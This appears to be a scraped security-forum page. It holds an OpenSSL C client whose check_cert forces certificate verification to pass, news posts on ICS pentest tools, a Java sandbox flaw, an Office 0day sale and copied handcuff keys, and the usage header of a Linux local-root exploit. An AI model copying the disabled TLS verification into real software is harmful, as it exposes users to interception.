// relevant information upon why the call failed.
void berr_exit(char *str){
    // str carries caller-built text (host names, strerror output):
    // it is printed as data, never passed as the format string.
    fprintf(stderr,"%s",str);
    ERR_print_errors_fp(stderr);
    exit(EXIT_FAILURE);
}

#ifdef WIN32
int strcasecmp(char *s1,char *s2){
    while ((*s1 != '\0') && (*s2 != '\0')){
        if (toupper(*s1) > toupper(*s2))
            return 1;
        if (toupper(*s1++) < toupper(*s2++))
            return -1;
    }
    return 0;
}
#endif

/*
 * Check that the common name matches the
 * host name.
 */
void check_cert(SSL *ssl, char *host){
    X509 *peer;
    char peer_CN[256];
    // Force the verify result to X509_V_OK. The context was created with
    // SSL_VERIFY_NONE, so no chain validation has taken place and the
    // check below always passes: only the common name comparison remains.
    // A client that must trust the peer uses SSL_VERIFY_PEER (and, in
    // OpenSSL 1.0.2+, X509_check_host for subjectAltName matching) instead.
    SSL_set_verify_result(ssl,X509_V_OK);
    // Verify certificate
    //if ((peer=SSL_get_peer_certificate(ssl)) == NULL)
    //    berr_exit("Could not get peer certificate\n");
    if (SSL_get_verify_result(ssl) != X509_V_OK)
        berr_exit("Certificate doesn't verify\n");
    /*Check the cert chain.
      The chain length is automatically checked by OpenSSL when we set the
      verify depth in the ctx */
    /*Check the common name*/
    peer=SSL_get_peer_certificate(ssl);
    if (peer == NULL)
        berr_exit("Could not get peer certificate\n");
    X509_NAME_get_text_by_NID (X509_get_subject_name(peer), NID_commonName, peer_CN, 256);
    X509_free(peer);
    if(strcasecmp(peer_CN,host)){
        fprintf(stderr,"Peer name %s doesn't match host name %s\n",peer_CN,host);
        exit(EXIT_FAILURE);
    }
}

SOCKET tcp_connect(char *connect_str){
    struct hostent *hp;
    struct sockaddr_in addr;
    SOCKET sock;
    char *Webhost=connect_str;
    unsigned short port;
    char *cp;
    char error[80];
    if((cp=strrchr(connect_str,':')) == NULL){
        fprintf(stderr,"Bad syntax %s\n", connect_str);
        exit(EXIT_FAILURE);
    }
    *cp='\0';
    cp++;
    port=(unsigned short)atoi(cp);
    if(!(hp=gethostbyname(Webhost)))
        berr_exit("Couldn't resolve host");
    memset(&addr,0,sizeof(addr));
    addr.sin_addr=*(struct in_addr*)hp->h_addr_list[0];
    addr.sin_family=AF_INET;
    addr.sin_port=htons(port);
    if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
        snprintf(error,sizeof(error),"Couldn't create socket %s\n",strerror(errno));
        berr_exit(error);
    }
    if (connect(sock,(struct sockaddr *)&addr,sizeof(addr))<0){
        snprintf(error,sizeof(error),"Couldn't connect socket %s\n",strerror(errno));
#ifndef WIN32
        close(sock);
#else
        closesocket(sock);
#endif
        berr_exit(error);
    }
    return sock;
}

// This routine handles a https request. It uses a Secure Socket handle to
// communicate with the remote HTTP server.
void https_connection_handle(char *connect_str, char *tmpbuf){
    SSL_CTX *ctx;
    SSL *ssl;
    BIO *cbio,*out;
    int len;
    char str[80];
    SOCKET s;
    char *cp=tmpbuf;
    int r;
    SSL_load_error_strings();
    // Initialize the SSL library.
    SSL_library_init();
    OpenSSL_add_all_ciphers();
    // Create an SSL context that will be used to communicate over TLSv1 or SSLv2 or SSLv3
    // protocols.
    // See RFC 2818.
    if ((ctx=SSL_CTX_new(SSLv23_client_method()))==NULL)
        berr_exit("Can't initialize SSLv23 context");
    SSL_CTX_set_verify(ctx,SSL_VERIFY_NONE,NULL);
    // Connect to remote peer either proxy or https server
    // using classic Socket API.
    // Get the actual host name through the host variable.
    s=tcp_connect(connect_str);
    //Connect SSL to CTX
    ssl=SSL_new(ctx);
    // Associate BIO cbio with socket s
    cbio=BIO_new_socket((int)s,BIO_NOCLOSE);
    SSL_set_bio(ssl,cbio,cbio);
    // Let SSL_read/SSL_write retry transparently after a renegotiation
    // instead of returning SSL_ERROR_WANT_READ/WRITE.
    SSL_set_mode(ssl, SSL_MODE_AUTO_RETRY);
    out = BIO_new_fp(stdout, BIO_NOCLOSE);
    // Establish a link with the remote SSL session using chosen transport.
    if(SSL_connect(ssl) <= 0){
        snprintf(str,sizeof(str),"Error connecting to server's session\n");
        berr_exit(str);
    }
    check_cert(ssl,connect_str);
    // Now emit over the network the https:// string.
    len=(int)strlen(cp);
    while (len){
        r = SSL_write(ssl,cp,len);
        if (r>0){
            len -=r;
            cp += r;
        }
        else{
            if (r==0){
                fprintf (stderr,"Partner exited...\n");
                goto end;
            }
            else
                berr_exit("SSL_write error");
        }
    }
    for(;;){
        len = SSL_read(ssl, tmpbuf, 1024);
        if(len <= 0)
            break;
        BIO_write(out, tmpbuf, len);
        //fwrite(tmpbuf,1,len,stdout);
    }
    BIO_write(out,"\n",sizeof("\n"));
    //fwrite("\n",1,sizeof("\n"),stdout);
end:;
    SSL_shutdown(ssl);
    BIO_free_all(cbio);
    BIO_free(out);
}

// This routine handles a http request. Although it uses OpenSSL BIO functions,
// the connection is unsecured. It can be expressed with a classic TCP/IP
// communication.
void http_connection_handle(char *connect_str,char *tmpbuf){
    BIO *cbio, *out;
    int len;
    char str[80];
    ERR_load_crypto_strings();
    cbio = BIO_new_connect(connect_str);
    out = BIO_new_fp(stdout,BIO_NOCLOSE);
    if(BIO_do_connect(cbio) <= 0) {
        snprintf(str,sizeof(str), "Error connecting to server %s\n",connect_str);
        berr_exit(str);
    }
    BIO_puts(cbio, tmpbuf);
    for(;;){
        len = BIO_read(cbio, tmpbuf, 1024);
        if(len <= 0)
            break;
        BIO_write(out, tmpbuf, len);
        //fwrite(tmpbuf,1,len,stdout);
    }
    BIO_write(out,"\n",sizeof("\n"));
    //fwrite("\n",1,sizeof("\n"),stdout);
    BIO_free(cbio);
    BIO_free(out);
}

int main(int argc, char **argv){
    char *proxy_server;
    char *host;
    char tmpbuf[1024];
    unsigned short port, http_proxy_port = HTTP_PROXY_PORT;
    char Webpage[80];
    char *userpwd;
    char *cp;
    char connect_str[80];
    int n;
#ifdef WIN32
    WORD wVersionRequested = MAKEWORD (2,0);
    WSADATA wsaData;
    int err;
#endif
#ifdef WIN32
    CRYPTO_malloc_init();
#endif
    if (argc < 2)
        usage(argv[0]);
    proxy_server=argv[2];
    host = parse(argv[1],&argv[3],argc-3,Webpage,sizeof(Webpage),&port,&userpwd);
    if ((proxy_server != NULL) && (strcmp(proxy_server,""))){
        // Parse a proxy server with a colon followed by
        // the http default proxy port.
        cp = strchr(proxy_server,':');
        if (cp != NULL){
            *cp = 0;
            cp++;
            if (port != HTTP_PORT)
                port = http_proxy_port = (unsigned short)atoi(cp);
        }
    }
    // Did the user specify a HTTP_PORT ?
    if ((cp = strchr(host,':')) != NULL){
        *cp++ = '\0';
        port = (unsigned short)atoi(cp);
        if ((port == http_proxy_port) && (!proxy_server))
            proxy_server = host;
    }
    // Setup the HTTP command.
    // Bounded writes only: host and Webpage come from the command line and
    // tmpbuf is reused later as the 1024-byte read buffer.
    n = snprintf(tmpbuf, sizeof(tmpbuf), "GET %s%s%s HTTP/1.1%sHost: %s%s",
                 (port == http_proxy_port) ? (strstr(argv[1],https) ? https : http) : "",
                 (port == http_proxy_port) ? host : "",
                 Webpage, CRLF, host, CRLF);
    if (userpwd && n >= 0 && (size_t)n < sizeof(tmpbuf)){
        char *b64 = encode_64(userpwd,"");
        n += snprintf(tmpbuf+n, sizeof(tmpbuf)-n, "Authorization: Basic %s%s", b64, CRLF);
        free(b64);
    }
    if (n >= 0 && (size_t)n < sizeof(tmpbuf))
        n += snprintf(tmpbuf+n, sizeof(tmpbuf)-n, "%s", CRLF);
    if (n < 0 || (size_t)n >= sizeof(tmpbuf)){
        fprintf(stderr,"Request too long for the %u byte buffer\n",(unsigned)sizeof(tmpbuf));
        exit(EXIT_FAILURE);
    }
    snprintf(connect_str,sizeof(connect_str),"%s:%1u",
             port==http_proxy_port?proxy_server:host, port);
#ifdef WIN32
    err = WSAStartup(wVersionRequested,&wsaData);
    if (err != 0){
        printf("%%TELNET-F-CANTLOAD, cannot load winsock.dll");
        exit (1);
    }
    if ((LOBYTE(wsaData.wVersion) != 2) || (HIBYTE (wsaData.wVersion) != 0)){
        printf ("%%TELNET-F-BADVER, incorrect winsock.dll version\r\n");
        WSACleanup();
        exit (1);
    }
#endif
    if (strstr(argv[1],https))
        https_connection_handle(connect_str,tmpbuf);
    else
        http_connection_handle(connect_str,tmpbuf);
#ifdef WIN32
    WSACleanup();
#endif
    return 0;
}

********
encode.c
*********

#include <stdlib.h>
#include <string.h>

#define MAX_LINE 76 /* size of encoded lines */

static char basis_64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/*
 * Base64-encode str, inserting eol every MAX_LINE output characters and
 * after the last line. An empty eol ("") yields one unbroken line, which is
 * what the Authorization header needs. The result is malloc'd; the caller
 * frees it.
 */
char *encode_64(const char *str,const char *eol){
    unsigned int rlen;
    int len = strlen(str);
    int chunk;
    unsigned char c1,c2,c3;
    unsigned int eollen;
    char *r,*out;
    if (eol)
        eollen = strlen(eol);
    else{
        eol = "\n";
        eollen = 1;
    }
    /* calculate the length of the result */
    rlen = (len+2) / 3 * 4; /* encoded bytes */
    if (rlen) {
        /* add space for EOL */
        rlen += ((rlen-1) / MAX_LINE + 1) * eollen;
    }
    /* allocate a result buffer */
    out = r = malloc(rlen ?
rlen : 1); for (chunk=0; len > 0; len -= 3, chunk++) { if (chunk == (MAX_LINE/4)) { char *c = eol; char *e = eol + eollen; while (c < e) *r++ = *c++; chunk = 0; } c1 = *str++; c2 = *str++; *r++ = basis_64[c1>>2]; *r++ = basis_64[((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4)]; if (len > 2) { c3 = *str++; *r++ = basis_64[((c2 & 0xF) << 2) | ((c3 & 0xC0) >>6)]; *r++ = basis_64[c3 & 0x3F]; } else if (len == 2) { *r++ = basis_64[(c2 & 0xF) << 2]; *r++ = '='; } else { /* len == 1 */ *r++ = '='; *r++ = '='; } } if (rlen) { /* append eol to the result string */ char *c = eol; char *e = eol + eollen; while (c < e) *r++ = *c++; } *r = '\0'; /* every SV in perl should be NUL-terminated */ return(out); } REFERENCE: OpenSSL on-line help and searches on Google The Multithreaded Programming guide THREADTIME from Scott J.NORTON & Mark D/DIPASQUALE Order number : ISBN 0-13-190067-b Publisher : Hewlett-Packard Professionnel Books Sursa: Example-C OpenSSL client and server example
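The request builder above concatenates argv-derived strings into tmpbuf[1024] without any bounds check, and encode_64 sizes its buffer the way the Perl original did. The following is an added example, not code from the original post or from OpenSSL: it assembles the same Basic-auth GET request with snprintf and a Base64 encoder that refuses to write past its output buffer. The names b64_encode, append and build_get_request are this example's own, and the host, path and credentials are constructed sample values.

```c
/* Added example (not from the original post or OpenSSL): build the same
   "GET ... Authorization: Basic ..." request with bounds-checked writes.
   Every function returns -1 instead of overflowing. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

static const char b64tab[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* Base64-encode n bytes of src into dst (NUL-terminated, no line breaks).
   Returns the encoded length, or -1 if dst cannot hold the result. */
int b64_encode(const unsigned char *src, size_t n, char *dst, size_t dstlen)
{
    size_t need = ((n + 2) / 3) * 4 + 1;   /* 4 chars per 3 bytes, plus NUL */
    size_t i, o = 0;

    if (dstlen < need)
        return -1;
    for (i = 0; i + 2 < n; i += 3) {       /* full 3-byte groups */
        unsigned v = ((unsigned)src[i] << 16) | ((unsigned)src[i + 1] << 8) | src[i + 2];
        dst[o++] = b64tab[(v >> 18) & 63];
        dst[o++] = b64tab[(v >> 12) & 63];
        dst[o++] = b64tab[(v >> 6) & 63];
        dst[o++] = b64tab[v & 63];
    }
    if (n - i == 1) {                      /* one trailing byte -> "xx==" */
        unsigned v = (unsigned)src[i] << 16;
        dst[o++] = b64tab[(v >> 18) & 63];
        dst[o++] = b64tab[(v >> 12) & 63];
        dst[o++] = '=';
        dst[o++] = '=';
    } else if (n - i == 2) {               /* two trailing bytes -> "xxx=" */
        unsigned v = ((unsigned)src[i] << 16) | ((unsigned)src[i + 1] << 8);
        dst[o++] = b64tab[(v >> 18) & 63];
        dst[o++] = b64tab[(v >> 12) & 63];
        dst[o++] = b64tab[(v >> 6) & 63];
        dst[o++] = '=';
    }
    dst[o] = '\0';
    return (int)o;
}

/* Append one formatted piece at *off; returns 0 on success, -1 if it would not fit. */
static int append(char *buf, size_t buflen, size_t *off, const char *fmt, const char *arg)
{
    int n = snprintf(buf + *off, buflen - *off, fmt, arg);
    if (n < 0 || (size_t)n >= buflen - *off)
        return -1;
    *off += (size_t)n;
    return 0;
}

/* Build "GET <path> HTTP/1.1\r\nHost: <host>\r\n[Authorization: Basic <cred>\r\n]\r\n".
   userpwd is "user:password" or NULL. Returns the request length or -1. */
int build_get_request(char *buf, size_t buflen, const char *host,
                      const char *path, const char *userpwd)
{
    char cred[256];
    size_t off = 0;

    if (buflen == 0)
        return -1;
    buf[0] = '\0';
    if (append(buf, buflen, &off, "GET %s HTTP/1.1\r\n", path) < 0) return -1;
    if (append(buf, buflen, &off, "Host: %s\r\n", host) < 0) return -1;
    if (userpwd) {
        if (b64_encode((const unsigned char *)userpwd, strlen(userpwd), cred, sizeof cred) < 0)
            return -1;
        if (append(buf, buflen, &off, "Authorization: Basic %s\r\n", cred) < 0) return -1;
    }
    if (append(buf, buflen, &off, "%s", "\r\n") < 0) return -1;
    return (int)off;
}

int main(void)
{
    char req[512];   /* constructed sample host, path and credentials */
    int n = build_get_request(req, sizeof req, "example.com", "/index.html", "user:pass");
    if (n < 0) {
        fputs("request does not fit in the buffer\n", stderr);
        return 1;
    }
    fputs(req, stdout);
    return 0;
}
```

The point of the -1 return is that a caller deciding what to do with an oversized URL makes that decision explicitly, instead of the decision being made by whatever happens to sit after tmpbuf on the stack.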
-
Give me a few examples of what was on RST 2 years ago. And then someone with an account that is 2 years and a bit old found it necessary to comment, a person whose posts I don't want to comment on because they are mostly about Havij...
-
[h=3]ICS Security Analysis — New Pentest Tools[/h]

Industrial control system (ICS/SCADA) security is a current trend in information security. However, there is always a shortage of specialized tools for pentesting or auditing ICS security. This article covers the latest publications, utilities, and presentations of Positive Technologies experts; all of this will help you to ensure industrial system security.

Theory To Start With

Understanding real threats is the core of any information security project. To ease this task, Positive Technologies experts, assisted by the community, undertook a large-scale study of ICS (ICS/SCADA) systems, the results of which are available here: http://ptsecurity.com/download/SCADA_analytics_english.pdf

Two Stories Of The Same Pentest

One of the problems of modern ICS is large-scale integrated projects related to MES construction and integration with business systems such as ERP. The report "From ERP to SCADA. Back and Forth. Two Stories of the Same Pentest" [ru] shows what such projects can result in if they do not comply with security requirements.

ICS/SCADA/PLC Google/Shodanhq Cheat Sheet

Statements that industrial control systems are reachable via the Internet are usually met with skepticism. A tool that lets you estimate the threat yourself has been published recently. Note that the devices and systems in this list are all enterprise-level systems and are hardly used to control fridges and microwaves. The following video demonstrates what ICS availability via the Internet can result in:

Attention! Do not try to repeat it at home. A vulnerable system can control a very important object, and if it is handled carelessly it may cause damage. If you detect an ICS available via the Internet, contact its owner or a Computer Emergency Response Team, who can eliminate this flaw. Contact GOV-CERT.RU if dealing with systems in Russia, or a regional CERT such as ICS-CERT if dealing with international systems. Anonymous, judging by their Twitter, have already considered this tool, which is a little scary.

PLCScan

This open-source utility detects devices in a network that communicate via the S7comm or Modbus protocols. When a device is detected, PLCScan tries to obtain information about its vendor, type, installed modules, etc. Demonstration video: The utility is available here: https://code.google.com/p/plcscan/.

WinCC Harvester

The Metasploit module WinCC Harvester can be used, once access to SCADA WinCC has been obtained, to collect additional information about the project, users, and controllers connected to the system. Demonstration video: The utility is available here: https://github.com/nxnrt/wincc_harvester.

Siemens SIMATIC WinCC 7.X Security Hardening Guide

A checklist that can be used for configuring WinCC in accordance with security requirements and for assessing system security in the course of audits. If many systems are assessed, the procedure can be automated, as in the case of MaxPatrol.

Siemens WinCC / S7 Under The X-ray

The SCADA Security Scientific Symposium held in Miami on January 16-17 saw a report by Positive Technologies experts on the results of Siemens WinCC/S7 security research. The report covered SIMATIC WinCC/WinCC Flexible/TIA Portal and S7 PLCs, from the network stack to the application, and from a system architecture review to firmware reverse engineering. Sergey Gordeychik, Gleb Gritsay, and Denis Baranov considered almost 50 zero-day vulnerabilities and released a checklist for the configuration of WinCC Flexible 2008.

S7 password offline bruteforce tool

During the report the Positive Technologies experts also provided a utility that can be used to test S7 password strength in the course of audits and pentests. The utility is available here: [Python] s7-brute-offline.py - Pastebin.com.

Posted by Positive Research at 12:56 AM

Sursa: Positive Research Center: ICS Security Analysis — New Pentest Tools
-
[h=1]Experts: Silent Exploits Still Possible in Java 7, Despite Security Improvements[/h]January 28th, 2013, 08:31 GMT · By Eduard Kovacs Researchers from Security Explorations have identified yet another vulnerability that affects Java 7 Update 11. Dubbed “Issue 53,” the security hole can be exploited to execute malicious code even if the security settings are configured to “Very High.” With the release of Java 7 Update 10, Oracle has made some “very significant” security improvements, including a feature that allows users to control the level of security when unsigned apps are executed in a web browser. In theory, when users set the security level to “Very High,” unsigned (sandboxed) apps cannot be executed within the web browser. However, Security Explorations has found that these security mechanisms are not as effective as they should be. “What we found out and what is a subject of a new security vulnerability (Issue 53) is that unsigned Java code can be successfully executed on a target Windows system regardless of the four Java Control Panel settings,” Adam Gowdiak, CEO of Security Explorations, told Softpedia in an email. “Our Proof of Concept code that illustrates Issue 53 has been successfully executed in the environment of latest Java SE 7 Update 11 (JRE version 1.7.0_11-b21) under Windows 7 OS and with ‘Very High’ Java Control Panel security settings,” Gowdiak added. “That said, recently made security ‘improvements’ to Java SE 7 software don't prevent silent exploits at all. Users that require Java content in the web browser need to rely on a Click to Play technology implemented by several web browser vendors in order to mitigate the risk of a silent Java Plugin exploit.” This is not the only vulnerability identified by the Polish security firm in Java 7 Update 11. A few days after Oracle had released the latest update to address a zero-day flaw in Update 10, the experts identified a couple of new security holes (“Issue 51” and “Issue 52”). 
Sursa: Experts: Silent Exploits Still Possible in Java 7, Despite Security Improvements - Softpedia
-
[h=1]Red October Scares Russia, Putin Orders New Cyber Security Structure[/h]January 28th, 2013, 08:21 GMT · By Eduard Kovacs - Vladimir Putin orders new cyber security structure Red October is said to be one of the largest cyber espionage campaigns ever. Since Russian organizations have been a target of this operation, President Vladimir Putin has ordered the deployment of a new structure aimed at protecting the country against cyberattacks. The structure will be part of Russia’s Federal Security Service (FSB), The Voice of Russia informs. The country already has several units whose main goal is to defend its networks against cyberattacks, but experts believe that this is a logical move, considering that the threat is constantly growing. When they released the details on Red October, experts from Kaspersky Lab revealed that Russia was not only a target, but also the country that, along with Germany, hosted the largest number of command and control servers utilized by the cybercriminal operation. Sursa: Red October Scares Russia, Putin Orders New Cyber Security Structure - Softpedia
-
[h=1]Security Brief: Google Defacements and Blackmail[/h]January 27th, 2013, 08:13 GMT · By Eduard Kovacs Almost every day this past week we saw headlines which read “Google was defaced.” Google wasn’t actually defaced, but some hacker groups managed to breach various DNS servers and made it look like Google websites had been defaced. Iranian hackers defaced YouTube, Intel, Gmail and Google Turkmenistan. Then, Pakistani hackers from the PAKbugs collective made it look like Google Morocco and Google Saint Helena were hacked. Cyber News reports that some high-profile sites from Uganda might have had the same fate. Extortionist hackers from the Rex Mundi collective are back. After they unsuccessfully tried to blackmail Drake International, now they’ve set their sights on the Belgian financial institution Buy Way. The company’s representatives told us that they had no intention of paying the hackers because they didn’t want to “finance crime economy.” We’ve also seen some interesting hacks this week. However, the biggest one of them appears to be the one that targeted the United States Sentencing Commission. Anonymous hacktivists defaced the USSC website, explaining that the FBI’s recent infiltrations haven’t discouraged them. Another hack worth mentioning is the one which targeted MIT. The institute’s website was hacked for the second time in response to Aaron Swartz’s death. Operation Ababil 2 continues. This week, Izz ad-Din al-Qassam Cyber Fighters launched DDoS attacks against not one, not two, but 24 US bank websites. They started with PNC, Wells Fargo, Regions, Bank of America, Citibank, Harris, BankZions, Capital One, Huntington and BB&T. Then, they added 14 new financial institutions to their target list: Synovus Bank, Bank of the West, Union Bank, Umpqua Bank, University Federal Credit Union, UMB Bank, People's United Bank, Patelco Credit Union, M&T Bank, First Citizens Bank, Citizens Bank, Key Bank, BBVA Compass, and Comerica.
In the arrests/convictions/charges section we had the two British Anonymous hackers who were sentenced to jail for launching DDOS attacks on PayPal. We’ve also learned that self-proclaimed Anonymous spokesperson Barrett Brown has been hit with new charges. In addition, three individuals suspected of being involved in the creation and distribution of the Gozi malware have been charged in a Manhattan court. Sursa: Security Brief: Google Defacements and Blackmail - Softpedia
-
Counter-Strike and X3: Reunion Support Linux Submitted by nibulix on Sun, 01/27/2013 - 18:08 The wave of new games coming to Linux doesn't stop after the release of Steam Beta for Linux. Recently Counter-Strike and X3: Reunion were activated for Linux and can be played on Linux now, even if they are not labeled as such on Steam. But it is not only older titles that are being released for Linux. One of the most successful strategy games of recent times, Crusader Kings II, was published for Linux recently. Sursa: Counter-Strike and X3: Reunion Support Linux | Steam for Linux
-
Pentagon to boost cybersecurity force RICK WILKING/Reuters - A network defender works at the Air Force Space Command Network Operations & Security Center in Colorado Springs, Colorado. The Pentagon is expanding efforts to safeguard critical computer systems and conduct cyberattacks against foreign adversaries, officials say. By Ellen Nakashima, Monday, January 28, 12:42 AM The Pentagon has approved a major expansion of its cybersecurity force over the next several years, increasing its size more than fivefold to bolster the nation’s ability to defend critical computer systems and conduct offensive computer operations against foreign adversaries, according to U.S. officials. The move, requested by the head of the Defense Department’s Cyber Command, is part of an effort to turn an organization that has focused largely on defensive measures into the equivalent of an Internet-era fighting force. The command, made up of about 900 personnel, will expand to include 4,900 troops and civilians. Details of the plan have not been finalized, but the decision to expand the Cyber Command was made by senior Pentagon officials late last year in recognition of a growing threat in cyberspace, said officials, who spoke on the condition of anonymity because the expansion has not been formally announced. The gravity of that threat, they said, has been highlighted by a string of sabotage attacks, including one in which a virus was used to wipe data from more than 30,000 computers at a Saudi Arabian state oil company last summer. The plan calls for the creation of three types of forces under the Cyber Command: “national mission forces” to protect computer systems that undergird electrical grids, power plants and other infrastructure deemed critical to national and economic security; “combat mission forces” to help commanders abroad plan and execute attacks or other offensive operations; and “cyber protection forces” to fortify the Defense Department’s networks.
Targeting ‘malicious actors’ Although the command was established three years ago for some of these purposes, it has largely been consumed by the need to develop policy and legal frameworks and ensure that the military networks are defended. Current and former defense officials said the plan will allow the command to better fulfill its mission. “Given the malicious actors that are out there and the development of the technology, in my mind, there’s little doubt that some adversary is going to attempt a significant cyberattack on the United States at some point,” said William J. Lynn III, a former deputy defense secretary who helped fashion the Pentagon’s cybersecurity strategy. “The only question is whether we’re going to take the necessary steps like this one to deflect the impact of the attack in advance or ... read about the steps we should have taken in some post-attack commission report.” Although generally agreed to by the military’s service chiefs, the plan has raised concerns about how the Army, Navy, Marines and Air Force will find so many qualified cybersecurity personnel and train them. It also raises deeper issues — which are likely to intensify as the Cyber Command grows over the years — about how closely the command should be aligned with the National Security Agency, the giant electronic-spying agency that provides much of its intelligence support. The head of the Cyber Command, Gen. Keith B. Alexander, is also the director of the NSA, which employs some of the nation’s most advanced cyber-operations specialists. The new force structure was alluded to last fall in a major speech by Defense Secretary Leon E.
Panetta, who said, “Our mission is to defend the nation,” and noted that the department was “putting in place the policies and organizations we need to execute the mission.” In an interview, a senior defense official said that the “national mission” teams would focus their efforts overseas and that any actions they took would be directed outside U.S. networks — unless the teams were asked to provide assistance to another agency with domestic authority, such as the FBI. “There’s no intent to have the military crawl inside industry or private networks and provide that type of security,” the official said. He stressed that the military would act only in cases in which there was a threat of an attack that could “really hurt,” adding: “We’re not talking about doing something to make sure that Mrs. Smith’s bank account didn’t get hijacked by somebody.” The plan to expand the Cyber Command comes at a time when the military’s services are being ordered to cut spending, a reflection of how important senior military officials consider the need to improve the nation’s cybersecurity footing. Some military officials have grudgingly accepted the need to contribute personnel to an expanded cybersecurity force. There are also differences over how much control the combatant commands will have over cyber teams. The “combat mission” teams may help commanders in operations such as a cyber component to disable an enemy’s command-and-control system before a conventional attack. Each region will have teams that focus on particular threats — say, from China or Iran. “You get the resource guys sucking a lot of air through their teeth because they know their service chiefs have backed it,” one Navy official said. “So they have to find the resources to pay for the people.” Alignment with NSA Some military and defense officials question whether the Cyber Command can reach its full potential as a military command as long as it is so dependent on the NSA and is led by the NSA’s director.
The close relationship between the two has had its advantages, officials say: The agency can peer into foreign networks and provide the command with intelligence, including in cases in which an adversary is suspected of planning a computer attack or developing a potent virus. “That gives you an advantage of being able to plan for and be prepared to react,” the defense official said. But the NSA is so intertwined with the Cyber Command — the two operations centers are located side by side, and, until recently, some Cyber Command personnel had nsa.gov e-mail addresses — that some current and former officials wonder whether the military command can create an independent, strategic doctrine. The concern is that the intelligence agency’s priorities will dominate, with an emphasis on the development of tools that are useful for surveillance but not necessarily for disrupting adversaries. There’s a “cogent argument” to be made that for the Cyber Command to become a true military command, “you sever that” relationship, one military official said. But, in fact, said one former intelligence official, the NSA uses military personnel to do much of its work and pays for a good portion of the services’ cyber operators. “That’s been the plan all along,” the former official said. “Take the talent resident in NSA, turn it into [cyber] attack talent.” With the decision to expand the Cyber Command, Alexander, who has been asked to stay on until summer 2014, is seeing some of his vision fulfilled. He has sought independent budget authority for the Cyber Command to hire and control forces, similar to the way Special Operations Command can. He has not won that authority, though officials agreed to give him the additional forces. He also has the support of senior Pentagon officials to elevate the Cyber Command to full command status, out from under the aegis of Strategic Command. But that move, which requires consulting with Congress, is not happening just yet, officials say. 
Sursa: Pentagon to boost cybersecurity force - The Washington Post
-
[h=1]Microsoft Office Command Execution 0day Being sold for $20,000[/h]Posted by: FastFlux on January 25, 2013 The 1337day team has just posted an exploit which is going for 20,000 USD. This 0day is contained in Microsoft Office and affects versions 2003, 2007 and 2010. It was placed under the “Remote Exploits” category, and the description was: “Microsoft Office 2003/2007/2010 all service pack from a command execution vulnerability .” The team also included a YouTube video demonstrating the exploit and proving that it’s real. These types of 0days can be detrimental to all Windows users; both home users and businesses utilize Microsoft Office on a daily basis, making this a critical exploit. You can view and purchase the exploit, here. Sursa: Microsoft Office Command Execution 0day Being sold for $20,000
-
[h=3]CentOS Linux bible[/h]

This is a guide to the CentOS Linux operating system. Linux guru Tim Boronczyk thoroughly covers the topic, whether you're a Linux novice or a regular who now wants to master this increasingly popular distribution. First find out how to install and configure CentOS. From there, you'll cover a wealth of Linux and CentOS tools, functions, and techniques, including: how to work in the GNOME and KDE desktop environments; how to use the Linux shell, file system, and text editor; how to configure CUPS printers, Samba for file and printer sharing, and other features using GUI tools; and more.

Size: 18Mb
Publication year: 2009
Book language: English

Via: CentOS Linux bible | Linux Ubuntu - Linux Books - Linux Distribution
-
Hacker Opens High Security Handcuffs With 3D-Printed And Laser-Cut Keys Andy Greenberg, Forbes Staff Two 3D-printed and one laser-cut copy of restricted handcuff keys. The security of high-end handcuffs depends on a detainee not having access to certain small, precisely-shaped objects. In the age of easy 3D printing and other DIY innovations, that assumption may no longer apply. In a workshop Friday at the Hackers On Planet Earth conference in New York, a German hacker and security consultant who goes by the name “Ray” demonstrated a looming problem for handcuff makers hoping to restrict the distribution of the keys that open their cuffs: With plastic copies he cheaply produced with a laser-cutter and a 3D printer, he was able to open handcuffs built by the German firm Bonowi and the English manufacturer Chubb, both of which attempt to control the distribution of their keys to keep them exclusively in the hands of authorized buyers such as law enforcement. The demonstration highlights a unique problem for handcuff makers, who design their cuffs to be opened by standard keys possessed by every police officer in a department, so that a suspect can be locked up by one officer and released by another, says Ray. Unlike other locks with unique keys, any copy of a standard key will open a certain manufacturer’s cuff. “Police need to know that every new handcuff they buy has a key that can be reproduced,” he says. “Until every handcuff has a different key, they can be copied.” Ray presenting his work at the HOPE conference. Unlike keys for more common handcuffs, which can be purchased (even in forms specifically designed to be concealable) from practically any survivalist or police surplus store, Bonowi’s and Chubb’s keys can’t be acquired from commercial vendors. Ray says he bought a Chubb key from eBay, where he says they intermittently appear, and obtained the rarer Bonowi key through a source he declined to name.
Then he precisely measured them with calipers and created CAD models, which he used to reproduce the keys en masse, both in plexiglass with a friend’s standard laser cutter and in ABS plastic with a Repman 3D printer. Both types of tools can be found in hacker spaces around the U.S. and, in the case of 3D printers, thousands of consumers’ homes. A Bonowi key (top) and a Chubb key (bottom) with a laser cut plexiglass key that opens either between them. Over the weekend, a lockpick vendor at the HOPE conference was already selling dozens of the plexiglass Chubb keys for a mere $4 each. Ray says he plans to upload the CAD files for the Chubb key to the 3D-printing Web platform Thingiverse after the annual lockpicking conference LockCon later this week. I reached out to both Chubb and Bonowi’s parent company Assa Abloy over the weekend, and will update this story when I hear back from them. Ray also tried creating a duplicate plexiglass key for high-security handcuffs from the German manufacturer Clejuso, but found that when the cuffs were fully secured the plexiglass wasn’t strong enough to overcome their internal springs. An attendee at the workshop helpfully suggested he try laser-cutting the stronger material Lexan instead. Dozens of Chubb keys being reproduced in a laser-cutter. Ray, who typically works as a computer security consultant but has also advised the German police on handcuff technology, says his goal isn’t to reduce handcuffs’ security so much as to expose their vulnerabilities. His tools, he argues, are already available to criminals along with the rest of the public. “If someone is planning a prison or court escape, he can do it without our help,” says Ray. “We’re just making everyone aware, both the hackers and the police.” Sursa: Hacker Opens High Security Handcuffs With 3D-Printed And Laser-Cut Keys - Forbes
-
Local race - Linux 2.6 ALL - h00lyshit

/*
** Author: h00lyshit
** Vulnerable: Linux 2.6 ALL
** Type of Vulnerability: Local Race
** Tested On : various distros
** Vendor Status: unknown
**
** Disclaimer:
** In no event shall the author be liable for any damages
** whatsoever arising out of or in connection with the use
** or spread of this information.
** Any use of this information is at the user's own risk.
**
** Compile:
** gcc h00lyshit.c -o h00lyshit
**
** Usage:
** h00lyshit <very big file on the disk>
**
** Example:
** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
**
